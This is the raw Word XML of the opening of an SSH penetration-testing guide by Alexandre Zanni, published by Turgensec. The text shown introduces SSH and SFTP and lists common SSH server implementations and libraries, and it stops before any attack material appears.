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16C39" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="59"/>
          <w:szCs w:val="59"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="59"/>
          <w:szCs w:val="59"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>SSH Pentesting Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E61B78D" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>A Comprehensive Guide to Breaking SSH. Written by Alexandre Zanni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB64D4" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="000F8650" wp14:editId="6EA05E76">
            <wp:extent cx="7219950" cy="5422900"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1" name="Picture 1" descr="SSH Pentesting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Pentesting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9950" cy="5422900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7F33A" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>SSH Pentesting Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AEC9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In this guide, I will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1002FB5B" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Quickly introduce the SSH protocol and implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7182C3" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Expose some common configuration mistakes then showcase some attacks on the protocol &amp; implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B24F39" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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lastRenderedPageBreak/>
        <w:t>Present some SSH pentesting &amp; blue team tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61963C7C" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Give a standard reference for security guidelines and finally talk about an article I previously wrote on the topic of network pivoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B47C6"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7BDCB5"/>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If you’d like to suggest an amendment or </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>contribute to this article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> send us an email through to nathaniel@turgensec.com. We’ll also do our best to propagate additions and suggestions from social media!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D51E4"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EEEEEE"/>
        <w:spacing w:after="0" w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Turgensec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> provides cost effective bespoke security and security testing to individuals and organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB854C"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EEEEEE"/>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Our service offerings include penetration testing, open source counterintelligence, open source intelligence and digital asset management. </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Contact us by clicking here.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A959CFC" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing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Table of Contents</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="3175E4"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>show</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B44A5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textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>What are SSH and SFTP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67958AF4"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EEEEEE"/>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SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> is a secure remote shell protocol used for operating network services</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>securely over an unsecured network. The default SSH port is 22, it’s common to see it open on servers on Internet or Intranets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00A32E"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EEEEEE"/>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SFTP</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> is the SSH File Transfer Protocol, a protocol used to transfer files over an SSH connection. Most SSH implementations are also supporting SFTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0681152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textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>SSH servers/libs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115FD65"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7BDCB5"/>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The most famous and common SSH server and client is openSSH (</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>OpenBSD Secure Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve">). It’s a strong implementation which is well maintained and was </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>first released in 1999. So this is the implementation you will see the most often on BSD, Linux and even Windows as it is shipped in Windows since Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6DF4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But openSSH is not the only implementation, here are other ones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1CED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SSH servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7D7BA" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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10" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>openSSH</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291BF66E" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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11" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Dropbear</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – SSH implementation for environments with low memory and processor resources, shipped in OpenWrt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C9972E" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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12" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>PuTTY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – SSH implementation for Windows, the client is commonly used but the use of the server is rarer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B9828C" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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13" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>CopSSH</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – implementation of OpenSSH for Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D20F9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SSH libraries (implementing server-side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD3926" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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14" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>libssh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – multiplatform C library implementing the SSHv2 protocol with bindings in </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Python</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Perl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>R</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>; it’s used by KDE for sftp and by GitHub for the git SSH infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076351B" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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18" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>wolfSSH</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E01F87" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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19" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Apache MINA SSHD</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – Apache SSHD java library is based on Apache MINA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E266C43" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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20" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
